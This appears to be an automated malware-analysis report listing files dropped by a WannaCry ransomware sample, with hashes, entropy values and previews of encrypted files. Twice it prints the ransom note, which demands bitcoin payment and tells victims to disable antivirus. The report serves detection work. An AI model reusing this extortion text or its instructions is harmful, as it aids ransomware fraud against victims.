                                                  SSDEEP:6:bkEBYhW0i3TPjMD7aunT26fclRZ5P3TxgkeSJKe2br425Q585SHj8imn5eBS26Q9:bkEz6fcLH7xh2/scP5Ta
                                                  MD5:F2490ACF3E714B969D0F30FE5860690C
                                                  SHA1:1C3A7CB3375387871888271372AC8059F7FA9921
                                                  SHA-256:DB1DC39FE5CF7D3C8B73BB30AD626D8463D13619BA4B6C84350F8E0E1716F90B
                                                  SHA-512:34D91E6CD824BE7D41322C0D166830A0B088BAA3B55090975396EBCE8A031093F547E9A40A316CE6705E2C2CD3E1F93E2FDC207D9EE0E206171102133BC3CEC3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):456
                                                  Entropy (8bit):7.465434005752753
                                                  Encrypted:false
                                                  SSDEEP:12:bkERBaxl1NjqLb6RQ7MoIrUIa7+00Ziu2RN2mLI7aWdU9iasn:bkdNjQb6mMoIta7+rZJONuOOms
                                                  MD5:1D38271D621F9E52B2D051118D39B77F
                                                  SHA1:A128EA20F83896A7508C8456B1B73F90CCE43C30
                                                  SHA-256:FAB53F422E9DBD82B02C953C893BAF438017674059EA2C0D3785790CCD94E82F
                                                  SHA-512:FBF740FB063BD4871B97C0926DDA59B54017F01E26043F4842BFB4CE94AF1AEB586B6F2493A422B5163BF201E8C3D718786002B3BD409297979EC7777C87CE4D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):440
                                                  Entropy (8bit):7.438321985755335
                                                  Encrypted:false
                                                  SSDEEP:6:bkEjTL0Wsx+vi6px/IBP+asE/6dSKJmLUnC7AA+6v/M5HvM5d/vsGkJnd7HxAxB9:bkE3j6E8PlnyES8UC78LZOtsTjxAC2
                                                  MD5:9AA23BA282153EF3D4008C17D44B8FEE
                                                  SHA1:5E8D756E3A25954275A8B6694F2315C50048321A
                                                  SHA-256:EE30D2C5709D72BFCFFEF0C162796B334A457B3C283471189D9FA053DA698C11
                                                  SHA-512:66F682B04B3C4A18093C053A13DF24ABB1818A2D8A7E450CE45A0A6FA11E4E809D7D6F32DEA3B4BA833E69EAC797E099485CED261063D69CB3CE8229591B1CBA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2296
                                                  Entropy (8bit):7.917278620903038
                                                  Encrypted:false
                                                  SSDEEP:48:bk486c9SI57yxKtZJQnUzyoYJKxSj576+QrLf6daCRR/2Jn:o4nzI57gK92qwJKxc+7PfTW2Jn
                                                  MD5:F7C79BE74EE69485179DFC0E9A10D8D7
                                                  SHA1:E7339DE2065EF33EC73AA47016514696137187C9
                                                  SHA-256:3FCC1D7D309904B290435689B3FF18F7497451FEDA7F09D75B9DC9BA6C5FFB7E
                                                  SHA-512:F0F87E27A1ABE7B581FC6822E1A235CC5834CB8CEC20908B9149FE33879F44394238F11C19E2627C1D66B47A6CBF2DF6101D6A11886026F1FBEE93A0FFF33091
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):376
                                                  Entropy (8bit):7.441785693644595
                                                  Encrypted:false
                                                  SSDEEP:6:bkEQ2vZhBc+r6LLZS4FQJUaFNlhQI06CpnaSiY5fch5L/iqXh9omL6J0C2hyg:bkEQ2BcUMLs4FU1/7QcS750zLqqbom
                                                  MD5:4C251277440ACBC8C3189F97B65AF726
                                                  SHA1:5E98D5DEFE5DD7D056350A0055D68AFE86011F34
                                                  SHA-256:9A0E2AD59773C0842BA2D564A02BD1AA10B16B541CA46FB2AF4ECE51A77F83F1
                                                  SHA-512:9B8EB4C38F597BBE27CAE2EF0765757754B3AC29BB15542543E379D1EBAFEBDFEC6318D65CFE066914650D3FF5E2674D1EC86242180D886860C7B8F6DB210EEA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):28952
                                                  Entropy (8bit):7.993275457551298
                                                  Encrypted:true
                                                  SSDEEP:384:Kdq2XXKYzOC3FWJGYCSfZ3mdh3vk79LLncQaGzQ8ObCfW5GEHAEODzjqRPwM1nUQ:KgoXKQ+GG3mdhe3Pzn5S6zj2w4n7iA
                                                  MD5:3F0651599D9B56527535E15B676EABA8
                                                  SHA1:8996BC5A888D387F572A3DD0D5AA474DA010196B
                                                  SHA-256:F49234A51E929CA1CCD7FA10610733A493AA6F011A5AE804BE8BF6DA986E91CD
                                                  SHA-512:CDE942448B219AA7BCA6542B121935D234083459A049A9F08FA5B502AF93D3CA89A27E7048518921F3C5534AC4B48E02133FEB1C730C27432C9EA52B8DF1905C
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16664
                                                  Entropy (8bit):7.98715205887518
                                                  Encrypted:false
                                                  SSDEEP:384:MWJz+Qyy1yFW0UelK+KR5qaftMMPsPbEucv+rV0qid4rlUip:8QysAgbREa1dr1Nd4rl7
                                                  MD5:DCC79561798ED7E67C5542C56C870D6C
                                                  SHA1:0F8AD71469026BD327F40BBE429B0A66A588600F
                                                  SHA-256:3EE06FBE538E75BBA6CD88AFB4EB567D71D50C3551B46FD4E2FCA1F90772496B
                                                  SHA-512:D562093A4B48CAE7949BFEA29B64CFAE996D44334B39540C3F0C4CC976FF36993525B1C9559A007036F4F0952F17E010C202B4D8914DBE7CCC32BC97C359255E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):24904
                                                  Entropy (8bit):7.993469822656297
                                                  Encrypted:true
                                                  SSDEEP:768:Dd7c7w8l6WGw2KjoFtVbov69BGeGjaF2I:Dd7Po2So1boi9BdiYL
                                                  MD5:89E4BF8294B2C04B94D73D82783147E8
                                                  SHA1:CA9F8F445DF01B85250071761628F0D80C0DD437
                                                  SHA-256:6BEFE0B9479BB464650226DD30EADFDF4806AE88E224F418D971DBF2CD7A68AD
                                                  SHA-512:3438DB876FF6C2E6F682235EC4F7C8DDF045219CA2CF9C92B3CFD65DB01921D6C14E21C98E1C38FEF3E12FB8479558773220153DAF6EC86CEF7FB83F215BE815
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):277304
                                                  Entropy (8bit):7.999290034469061
                                                  Encrypted:true
                                                  SSDEEP:6144:qz3fqepKhhVKR2mRFzCX/YRPGFWgfI6cMom3AQ:qz3fqeshhER2mzXxgfmm3AQ
                                                  MD5:A6E6D9A17297C4411585E766BA818F1B
                                                  SHA1:5E687B2167BE9D775310D394FA2AB3A6EF8449E8
                                                  SHA-256:318317CC17E423E1C249FE01F28EBDD2641B8F0E9E9E7A84A99DD343873FD56D
                                                  SHA-512:3C85C72F2809053D6B51526CFFD12ED87E455029EB5EFC95AE2514BF37277272E89134898D8142BB4FBC86A1CC90778C23B07F6DF816B7C39F849AC10E9792B4
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):27000
                                                  Entropy (8bit):7.993109225418807
                                                  Encrypted:true
                                                  SSDEEP:768:qO9/vxTYkamH8Rw6va2NwUla+aFuZHECnMO5PRzHD1:qOzTEFv3PLHTnMcPRLD1
                                                  MD5:0CFF5466F813801FE669108FC88EFA6B
                                                  SHA1:DCDC816AB4BC7D5A543667B56B723461552BF557
                                                  SHA-256:A48413FE07FA9F6F5009446FE9556B2FEEC7C4084E16ADDF8895E43E824A53AB
                                                  SHA-512:44124DEEA29D6AFCB8B0A10D22C82A506EA6B6BC901643F7EB3FA208F97290881888452E27B0C3605CCD4B793C55BA69FE0F3A87296939A96D825B40CB78118D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6952
                                                  Entropy (8bit):7.971712427241319
                                                  Encrypted:false
                                                  SSDEEP:192:9jv1QnC9dwNdKshSl+oy+7hBKvkPP0iTo:9jvGY6OshSlHZzZTo
                                                  MD5:C19982C11E53BC5D6097817039924AEF
                                                  SHA1:112066DE1B23DEACFE921CE4CE6A801A8F06AD26
                                                  SHA-256:CAC3FCE8B74A8E30097FC695D9F5816B2DD73FC81231CE13BA367DAFBCA24690
                                                  SHA-512:B3049A9975179A0A23E4D7205C93BCF260FE5949A1BCB9A6E83929C1652C3D046F28FB612CA6AA4476EB3274D9EF843E0C3AB77E31A80E5374B437122C36882D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):242232
                                                  Entropy (8bit):7.99934672493712
                                                  Encrypted:true
                                                  SSDEEP:6144:HksNCvEXXCohEMSVazq+n6L9+hBVEOaVyU:HJNXrRSVaO+n6L9+h6VyU
                                                  MD5:733449179E12EC54B3EEE6C519258302
                                                  SHA1:BCC880D2C1EBC655375294A8A37DB0CF038746C4
                                                  SHA-256:099FCB2412C7CD8E7B0E4C595CEECE3BB968226ADF7DAB696E56B9E4E80839A1
                                                  SHA-512:118588FF814D6F1E4887DA166461497060AFE439F888C23FC3B6E33F16156740C2F5D26CB5F6225B7ED10F181D8DA05746105703E63D6FA756EF8C8326357DE4
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):76360
                                                  Entropy (8bit):7.997750798749787
                                                  Encrypted:true
                                                  SSDEEP:1536:LItgB3fBBDtD6NakCktxlAGA9wyuEPvOT4nvewtYozeYPV8:LItgdB/D68k/5ZEPmT4nviozef
                                                  MD5:8AC7E5A225BE5170A27ECBF89BD951AE
                                                  SHA1:59ED9E30627A096F05A890A75DA8A994B31312D0
                                                  SHA-256:01528597187765C62AAA0185AC62C52387316A37878EF5238703382DF7ED1EA7
                                                  SHA-512:5D975E70956A1E4A14599BFB46C68C75243C79C6F5DCCE78A6F5BE7AC95F9F6DC71A20F08DB3A1ECE3DBE7C1748169C145CBF5896FAC61E82C479FD8FA6A9FAB
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):164584
                                                  Entropy (8bit):7.998869873581819
                                                  Encrypted:true
                                                  SSDEEP:3072:ftz8wvDzxxhwYrMVN7kx0CCpwY7zC6BTgc+4enneMhegPL2YV12K:WGDzxvXrYixmpwATg4yvhJT2YV12K
                                                  MD5:304FE6BFADB9A351FF1102B5FA0EC1E4
                                                  SHA1:7F42E1495C522BE9DFDC3B2340DBAF51F3818F04
                                                  SHA-256:4D496F0A0489557C0B9089E890BAE80E26AC460A9571D2C780F02E0BC271CF21
                                                  SHA-512:1E4DBF633371FB5693BBA4ED50BDF3ECAAB4C775CE28EA86374616DE9FED043B6BFE1EB00291F0C2A1FDF0D435312B5D8125EE9C7991CFEEC9CF560CEF2EB4F2
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.20891929528607
                                                  Encrypted:false
                                                  SSDEEP:6:bkElyDeGTWdc+/VQT7dR/0B4pwNj9Tl7zcNkf/8ZG1lDxQwdr3vm:bkEIiGa0T7C4pqj9TpA6E4j6N
                                                  MD5:2068EB497E38B7AC3AF16393B69E643B
                                                  SHA1:423F6158E2566BBAB72BBCDFFF8E6ACBB700899F
                                                  SHA-256:2D507AA0BDBB90DC79937BE7F42718F500888A8E7CC22C0D867A4FEC6B904297
                                                  SHA-512:D8A72E8A9182EFEDBF8A1EBA54CA371B15ED2B3B2A5F09AAC64982C09A1ABB8EA6BA0F04CD9D96E45EC4E6D217AE69D2EC3D4B4A617280B4B844498258CAF629
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):27560
                                                  Entropy (8bit):7.993216079442338
                                                  Encrypted:true
                                                  SSDEEP:768:HLLUOsZgjXpBQijjNTeNG4Me9kbygubjI/vH8L4wq2Z4g42O:nUtQX3j4GsjxIXH8Qngm
                                                  MD5:379966675A50C2171AC9FB870A8868A7
                                                  SHA1:5754800998E0B822DEAD34DC53E3A8F954D03615
                                                  SHA-256:CCA274D4E668149678A0304DCF2FF6CA1F42B09D131575933FB2C894A49E6F56
                                                  SHA-512:B172C3F457F2329EEF4FA0C8FCAF01EAE0FD515952AD28FFFC1B4A65C684C425B9CE10F5F2A9A661EEA2416FC51D04D951A59617630F819A2304D5643A560C41
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):229640
                                                  Entropy (8bit):7.999232301019019
                                                  Encrypted:true
                                                  SSDEEP:6144:lj/8zxXqsLWOEXAsybX9rXe95+LNAtOa+4BNxDbqpMT:ZkxXqsLWOEM9LA5GNAtG4BN5biW
                                                  MD5:A63F99263AA8CF26AC5F3203B3C3A408
                                                  SHA1:152D6ABA149ED75C18F6DCFD88078EF2CF415D5D
                                                  SHA-256:A6CE1C1C7D74F13FCBA5344BFD1E4FE7D6B8B432DAF87965200373E4056C786E
                                                  SHA-512:FBD0765F11E0C0E79E58815D6CDAE69C2B525186D1644DF8B39148F3BF7E110959C9EDAEC6B5EEF204443BC4DCA4734AFEDBF20E8806AA540CCAEAA0E894BBD0
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):600
                                                  Entropy (8bit):7.611529433469389
                                                  Encrypted:false
                                                  SSDEEP:12:bkEZLljbY/sEjhFuFuSL9/ts2x+w05/2eEhLVSLSeSrPdQUD2VeyVR+Arfc:bkAlI/s0hFuFuc17e5/1Eh0SeKdQUAeB
                                                  MD5:12615C22B678522AFDCCF893A3DEBDDD
                                                  SHA1:D10F0E527CB1074103025A5D5C9469F45309A1D2
                                                  SHA-256:34864BBEADEDE214D9C8AEFC0013139348039302AADD6D249528DE4B622CA177
                                                  SHA-512:625D2AFC4C3E7E21C1ACE7E4F3715BB7B9E012EB64BB40E29F68ADC943D3ACFC1EBC7FE3370B968EEF98A2B44872CE5739B740C391C60F45BA584C700870CA7A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16664
                                                  Entropy (8bit):7.989500437442936
                                                  Encrypted:false
                                                  SSDEEP:384:I2dmixqQdEu3NZAzrgPDrpVKiVqk3RRX2pXR6jkPMof+mZ408s0BvLm:I2A8NdP9yzCDX/53RRXi8kP1mmeFk
                                                  MD5:EAEF79A8A6F81D681FFBD02F15A32591
                                                  SHA1:89A65E477A831AFC8FFC3195E08724A18B108E7E
                                                  SHA-256:51AC71D80654E04F0EE51E3735E7BC5AE3EC1AE31756EC1FEF6D73034E593C4D
                                                  SHA-512:2CE2FA4642413DA37456C547813DFFC5853AE346E7B27B93D211285FF8688CC8783AF82BD10702C1CC64B6E3B36ACD9E46F61EEFEA1D472B3E873C90611CB03C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):45336
                                                  Entropy (8bit):7.995175612324924
                                                  Encrypted:true
                                                  SSDEEP:768:I912xNBGW/JXjscqHH+mNECUwfMyVQPfegJS1VkiVFQCz65Kvi2KZz7/SAxyWMW:I9gxV/JsT2njYgA1J3JGii2EbSiyO
                                                  MD5:C7E4287E00225B6AA3E68BEC6CF2310B
                                                  SHA1:89B9ACC40592D70C10240106FFDD647FE96DE754
                                                  SHA-256:35CC46C514C1B50FA3B48700E57DC5BF7050EDAF7211E2C2D6650D4BBE8327D3
                                                  SHA-512:E5ACDEDBEF8E9F87EA9FE8FE4EE06EFE4FB7F4642AF8507CE0B97DE404E0BA9183ACA251AFAAD3E99703D4CBE6FA3CDFA05107842C74649A449EA32219B283C6
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6776
                                                  Entropy (8bit):7.974458092262019
                                                  Encrypted:false
                                                  SSDEEP:96:ohRzZAZyHeVntA9weGkU1Y7Sv1H7np0KpHyw/mCkUJ+LwtC671VRRinkN7Y2:GRzZAZ9hYGJTp913/xYktC6x0nkD
                                                  MD5:4132BFB8CD26079AA00E3C7105030CC2
                                                  SHA1:FFA1F27521FD78CA5D42B7D3D794DC899B742A02
                                                  SHA-256:D1757B15DF0D953EC7728A2A3EC4B82008106D49F42A53A5B606BDE1A69B5E94
                                                  SHA-512:A60A04A924AA116D3CD62961739A27EB64B2164A733DCB9DB141B8191EA119F61D5E663C7BBCB56BE31672BEBBCC39E56EBAFB991D65A6D487EDD821A9AA24E9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4664
                                                  Entropy (8bit):7.960020895062463
                                                  Encrypted:false
                                                  SSDEEP:96:ofmq0hddugcsq3UyxEvuOw5ZfU3iGiMhJ8FvRHXaHz:2mq2d8sq3UyJOd9ihZ3aT
                                                  MD5:BFDF16B75688901DC1C4CFEFEC8CEEAC
                                                  SHA1:47CBD1085EC68533A06EC29A9451118BABC9B884
                                                  SHA-256:B3CD72E2F6AF63D744F52714676C2DF9978E5435F3EA6683C269B6FFEADF3A1F
                                                  SHA-512:A5723FB6BFD5CA65F041B31EA200659DE11FB7822AE091F96585B732B578DA29351EA75FB4C9C71DE0AE6D8635B8CDEF17BFD5BFB825395DDF6E79C2B4655D48
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8616
                                                  Entropy (8bit):7.977366340510731
                                                  Encrypted:false
                                                  SSDEEP:192:NFw9hAeAdu0xRsP6QjTMuMI1iNPQUgW/DVkLVYqQBpUM8zIwsF8l:64ZEh7M9HgUixYdBezzII
                                                  MD5:7E50C396EA7103AAAAC49758D0941AB2
                                                  SHA1:1A3DB5777DD7E4DEC83D12A2A7284969AE287CB2
                                                  SHA-256:BF17F9F283A66AC4C2764192437C7736FE9CBDB2426C9A172292F8EDCEBFA724
                                                  SHA-512:B30B1FBF651EA3CCBDFA0F547D35F9FE56BC5E70ECFFB4B5639474BE62F77A374ED46F21CC7DD57BEE5A6FD07CC72CA7EA0EF9ED2E701F5EFA41FC7126265B15
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):14408
                                                  Entropy (8bit):7.986441560914633
                                                  Encrypted:false
                                                  SSDEEP:384:+DQzXYhwYK2o/44QfPxNBUvKKkxdjIK0C6iV:mq28rQCyKkrIK0C6iV
                                                  MD5:65590F49E90EA9A64AB065A9C06ADC9C
                                                  SHA1:EED081AFDFD2143D8867FCCF61454870090BD4A5
                                                  SHA-256:07420A077903164B9C0B8B5232552696C331918CD02A9200C50C90BF59C6533B
                                                  SHA-512:F2C9C073253341E55E9A337466D6F8286B9F46B0DB1ADEAC00A282AF7FD1A43DAF83F2ADF0777EDBBD49C0B56036A14C2C9816D423B61B578995FE12FD56C33C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5240
                                                  Entropy (8bit):7.967989837924161
                                                  Encrypted:false
                                                  SSDEEP:96:o52vE6zH0XSLpsxtSTvzR1MlRFgsZEG1t0JFR7lz+R5aOdpQ6JPb3IojWmwWzG:O2MQuSLlf0RFhZr1OJFPaR5JYAPb3Tz8
                                                  MD5:C06A5FB8F9C814ECEBF5873648AB08AF
                                                  SHA1:898430C41DA22779F2FDFEA6A35725B6F1FC140B
                                                  SHA-256:8F409554C60C1AA33ECE8C12C8AF2A02915D4897A40863A2A3CB73DE7650D639
                                                  SHA-512:D840C5BA79BCE391D388B104C49ED763C5DF30DFB83BC1270BC5566A5FCAA68426A3EC9F0B08F65337076DBFE552D2AC818A44A74C20C7B837D994C36151877A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7384
                                                  Entropy (8bit):7.975012600649983
                                                  Encrypted:false
                                                  SSDEEP:192:KkUuSpKeLB9LdRcph2jJBZVhlFtp0RcRnUL2Bvi+Ak:KkUVXL3ov2jJxfC2B6Zk
                                                  MD5:BD32F4E0CEA6512AE2BDE41D8060C9CA
                                                  SHA1:736F7E75DE5120B271527299479598F867A9F348
                                                  SHA-256:EEE2823ABB4B5C7BFA39E89F6CEFE8F24B4FBC9F272DCFB878D1B58501017B98
                                                  SHA-512:AF4E028789096C2928CAA965AE412FACADBFF12DCF316D79D68948BA3BE8632B2892B6C3499A2C57FE73C740EBFE37B95DBE89A29D6644C0BB318A6D9952E264
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):9032
                                                  Entropy (8bit):7.976801201794676
                                                  Encrypted:false
                                                  SSDEEP:192:KDnMOxG+BkTLhFokKFy2WF4pDsJF2lWaNmv0HZwen8i35quhc2:KomVGTLh+MFKpWF2Wa4vin8+p5
                                                  MD5:8AC5DFAB471ACA6EB4AA4BD919B38357
                                                  SHA1:A18EC056B1543603797AC11422EFC467C9DFE56A
                                                  SHA-256:A68F856C0925D0ED1E3C763A52C1DCB2DF6B4488815558DF2F58A9A3D941F600
